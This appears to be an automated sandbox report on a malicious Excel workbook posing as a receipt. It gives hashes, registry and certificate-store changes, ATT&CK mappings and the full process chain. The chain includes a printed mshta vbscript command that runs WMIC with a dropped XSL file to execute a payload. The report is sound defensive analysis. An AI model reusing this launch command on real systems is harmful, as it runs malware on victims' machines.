709e2a3846cb20034181c4bb090b6d98499955d850970b87d49e3271184e2d8f

General

Target

Reciept 96285898.xlsb
Size

134KB
MD5

c32e8a076a3dd64e30cd8b5c5a7a2276
SHA1

17b52997cf29214e7b06368269879237c09e7706
SHA256

709e2a3846cb20034181c4bb090b6d98499955d850970b87d49e3271184e2d8f
SHA512

d0a9295cdfb26fe2ee61767515ce279f5bc2c5529903875a76a7d3503215a1875c1dc1b177ce7c0031bd6bb2de6ad36ab4722dcf445bdc0e8184783636b44c50

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 27 IoCs

Processes:

WMIC.exe

flow	pid	process
8	436	WMIC.exe
10	436	WMIC.exe
12	436	WMIC.exe
14	436	WMIC.exe
16	436	WMIC.exe
17	436	WMIC.exe
18	436	WMIC.exe
19	436	WMIC.exe
21	436	WMIC.exe
22	436	WMIC.exe
23	436	WMIC.exe
24	436	WMIC.exe
26	436	WMIC.exe
27	436	WMIC.exe
28	436	WMIC.exe
29	436	WMIC.exe
31	436	WMIC.exe
33	436	WMIC.exe
35	436	WMIC.exe
36	436	WMIC.exe
37	436	WMIC.exe
38	436	WMIC.exe
40	436	WMIC.exe
41	436	WMIC.exe
42	436	WMIC.exe
43	436	WMIC.exe
45	436	WMIC.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 10 IoCs

adware spyware

Modify Registry

T1112

Processes:

EXCEL.EXEmshta.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	mshta.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

WMIC.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	WMIC.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	WMIC.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	WMIC.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	WMIC.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

1208 EXCEL.EXE

pid	process
1208	EXCEL.EXE

Suspicious use of AdjustPrivilegeToken 40 IoCs

Processes:

WMIC.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	436	WMIC.exe
Token: SeSecurityPrivilege	436	WMIC.exe
Token: SeTakeOwnershipPrivilege	436	WMIC.exe
Token: SeLoadDriverPrivilege	436	WMIC.exe
Token: SeSystemProfilePrivilege	436	WMIC.exe
Token: SeSystemtimePrivilege	436	WMIC.exe
Token: SeProfSingleProcessPrivilege	436	WMIC.exe
Token: SeIncBasePriorityPrivilege	436	WMIC.exe
Token: SeCreatePagefilePrivilege	436	WMIC.exe
Token: SeBackupPrivilege	436	WMIC.exe
Token: SeRestorePrivilege	436	WMIC.exe
Token: SeShutdownPrivilege	436	WMIC.exe
Token: SeDebugPrivilege	436	WMIC.exe
Token: SeSystemEnvironmentPrivilege	436	WMIC.exe
Token: SeRemoteShutdownPrivilege	436	WMIC.exe
Token: SeUndockPrivilege	436	WMIC.exe
Token: SeManageVolumePrivilege	436	WMIC.exe
Token: 33	436	WMIC.exe
Token: 34	436	WMIC.exe
Token: 35	436	WMIC.exe
Token: SeIncreaseQuotaPrivilege	436	WMIC.exe
Token: SeSecurityPrivilege	436	WMIC.exe
Token: SeTakeOwnershipPrivilege	436	WMIC.exe
Token: SeLoadDriverPrivilege	436	WMIC.exe
Token: SeSystemProfilePrivilege	436	WMIC.exe
Token: SeSystemtimePrivilege	436	WMIC.exe
Token: SeProfSingleProcessPrivilege	436	WMIC.exe
Token: SeIncBasePriorityPrivilege	436	WMIC.exe
Token: SeCreatePagefilePrivilege	436	WMIC.exe
Token: SeBackupPrivilege	436	WMIC.exe
Token: SeRestorePrivilege	436	WMIC.exe
Token: SeShutdownPrivilege	436	WMIC.exe
Token: SeDebugPrivilege	436	WMIC.exe
Token: SeSystemEnvironmentPrivilege	436	WMIC.exe
Token: SeRemoteShutdownPrivilege	436	WMIC.exe
Token: SeUndockPrivilege	436	WMIC.exe
Token: SeManageVolumePrivilege	436	WMIC.exe
Token: 33	436	WMIC.exe
Token: 34	436	WMIC.exe
Token: 35	436	WMIC.exe

Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

EXCEL.EXE

pid process

1208 EXCEL.EXE
1208 EXCEL.EXE
1208 EXCEL.EXE
1208 EXCEL.EXE
1208 EXCEL.EXE
1208 EXCEL.EXE
1208 EXCEL.EXE

pid	process
1208	EXCEL.EXE
1208	EXCEL.EXE
1208	EXCEL.EXE
1208	EXCEL.EXE
1208	EXCEL.EXE
1208	EXCEL.EXE
1208	EXCEL.EXE

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

EXCEL.EXEtaskeng.exemshta.EXE

description	pid	process	target process
PID 1208 wrote to memory of 316	1208	EXCEL.EXE	splwow64.exe
PID 1208 wrote to memory of 316	1208	EXCEL.EXE	splwow64.exe
PID 1208 wrote to memory of 316	1208	EXCEL.EXE	splwow64.exe
PID 1208 wrote to memory of 316	1208	EXCEL.EXE	splwow64.exe
PID 556 wrote to memory of 1684	556	taskeng.exe	mshta.EXE
PID 556 wrote to memory of 1684	556	taskeng.exe	mshta.EXE
PID 556 wrote to memory of 1684	556	taskeng.exe	mshta.EXE
PID 1684 wrote to memory of 436	1684	mshta.EXE	WMIC.exe
PID 1684 wrote to memory of 436	1684	mshta.EXE	WMIC.exe
PID 1684 wrote to memory of 436	1684	mshta.EXE	WMIC.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Reciept 96285898.xlsb"
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1208

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:316

C:\Windows\system32\taskeng.exe
taskeng.exe {40A207CF-A7B9-4832-BEDF-EA4C548CEA3A} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:556

C:\Windows\system32\mshta.EXE
C:\Windows\system32\mshta.EXE vbscript:Execute("set osh = CreateObject(""Wscript.Shell""):osh.Run(""wmic os get /format:"" & Chr(34) & osh.ExpandEnvironmentStrings(""C:\ProgramData"") & ""\\xDoNotSaveChanges.xsl"" & Chr(34)),0:close")
2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1684

C:\Windows\System32\wbem\WMIC.exe
"C:\Windows\System32\wbem\WMIC.exe" os get /format:"C:\ProgramData\\xDoNotSaveChanges.xsl"
3⤵
- Blocklisted process makes network request
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:436

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Install Root Certificate

1

T1130

Credential Access

Discovery

System Information Discovery

2

T1082

Query Registry

1

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\xDoNotSaveChanges.xsl
MD5
553b4380b0dea3566cb279a965f85629

SHA1
bae44084888e5bf95c6ec5a4e69d8287083e2c93

SHA256
8480d432ab1b8e8b259708908898a45a893562f3cff3ed2388579fbae94825c8

SHA512
e446648b995fff2bcf5a5cca3b800875b5dadd022dbf2484eb55be6c4e01711cea1c1dbbcdb78b583f3c764f4c35309aadb1d519fe3504fb6193f7647db696c7

Download Submit
memory/316-62-0x0000000000000000-mapping.dmp

Download
memory/316-63-0x000007FEFBDC1000-0x000007FEFBDC3000-memory.dmp

Filesize
8KB

Download
memory/436-67-0x0000000000000000-mapping.dmp

Download
memory/1208-59-0x000000002F491000-0x000000002F494000-memory.dmp

Filesize
12KB

Download
memory/1208-60-0x0000000071671000-0x0000000071673000-memory.dmp

Filesize
8KB

Download
memory/1208-61-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1208-64-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1684-65-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads